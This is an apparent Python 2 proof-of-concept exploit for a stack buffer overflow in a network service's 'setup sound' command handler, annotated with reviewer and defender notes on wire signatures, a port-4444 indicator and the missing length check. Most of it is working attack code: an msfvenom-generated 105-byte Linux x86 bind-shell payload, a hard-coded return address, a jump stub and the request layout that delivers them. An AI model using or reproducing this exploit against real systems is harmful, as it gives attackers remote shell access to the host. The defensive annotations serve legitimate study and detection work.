#!/usr/bin/python
import socket
# Proof-of-concept for a stack buffer overflow in a network service's
# "setup sound" command handler. Python 2 only: the string literals below are
# used as raw byte strings and the script ends with a `print` statement.
#
# Defender notes:
#  - Wire signature visible here: one "setup sound" command whose argument is
#    roughly 4.4 KB long and contains non-printable bytes.
#  - Per the msfvenom comment below, the payload binds a shell on TCP 4444, so
#    an unexpected listener on that port on the server host is an indicator.
#  - NOTE(review): a hard-coded absolute return address and execution of bytes
#    carried in the request only work when the target's addresses are
#    predictable and that memory is executable, presumably a build without
#    PIE/ASLR and NX. Confirm against the target build.
#  - The root-cause fix is a length check on the command argument in the
#    service itself; the offsets used here show the handler accepts more than
#    4368 bytes.

# Plain TCP connection to a service on the local host, port 13327.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 13327))
# 5 bytes of x86 machine code: `add eax, 0xc` followed by `jmp eax`.
# NOTE(review): presumably EAX points at the request text when this runs, so
# the jump lands on the payload placed right after "setup sound ". Not
# verifiable from this file.
first_stage = '\x83\xc0\x0c\xff\xe0'
# Little-endian encoding of 0x08134597, the value that overwrites the saved
# return address. NOTE(review): which instruction lives at that address is not
# shown here; it is specific to one build of the target binary.
return_address = '\x97\x45\x13\x08'
# Tool output recorded by the author: how the payload below was generated.
# The -b list excludes NUL, LF, CR and space from the encoded bytes.
#msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b '\x00\x0a\x0d\x20'
#No platform was selected, choosing Msf::Module::Platform::Linux from the payload
#No Arch selected, selecting Arch: x86 from the payload
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 105 (iteration=0)
#x86/shikata_ga_nai chosen with final size 105
#Payload size: 105 bytes
#Final size of c file: 465 bytes
# 105-byte encoded payload (7 rows of 15 bytes), matching the size reported above.
payload = (
"\xba\xa3\x97\xf1\x5e\xdb\xc3\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x14\x31\x53\x14\x83\xeb\xfc\x03\x53\x10\x41\x62\xc0\x85\x72"
"\x6e\x70\x79\x2f\x1b\x75\xf4\x2e\x6b\x1f\xcb\x30\xd7\xbe\x81"
"\x58\xea\x3e\x37\xc4\x80\x2e\x66\xa4\xdd\xae\xe2\x22\x86\xfd"
"\x73\x23\x77\xfa\xc0\x37\xc8\x64\xea\xb7\x6b\xd9\x92\x7a\xeb"
"\x8a\x02\xee\xd3\xf4\x79\x6e\x62\x7c\x7a\x06\x5a\x51\x09\xbe"
"\xcc\x82\x8f\x57\x63\x54\xac\xf7\x28\xef\xd2\x47\xc5\x22\x94"
)
# Request layout, counted from the byte after the 14-byte command prefix:
#   [0, 105)      payload
#   [105, 4368)   'A' filler
#   [4368, 4372)  return_address
#   [4372, 4377)  first_stage
#   [4377, 4379)  'C' filler (2 bytes)
#   then the 3-byte trailer '\x90\x00#'
buffer = '\x11(setup sound '
buffer += payload
# Pad up to offset 4368, where the overwritten return address is placed.
buffer += 'A' *(4368-105)
buffer += return_address
buffer += first_stage
# 4379 - 4368 - 4 - 5 == 2 bytes of filler, bringing the body to 4379 bytes.
buffer += 'C' *(4379 - 4368-4-5)
buffer += '\x90\x00#'
# Single send of the whole request, then print up to 1024 bytes of the reply.
s.send(buffer)
data = s.recv(1024)
print data
s.close()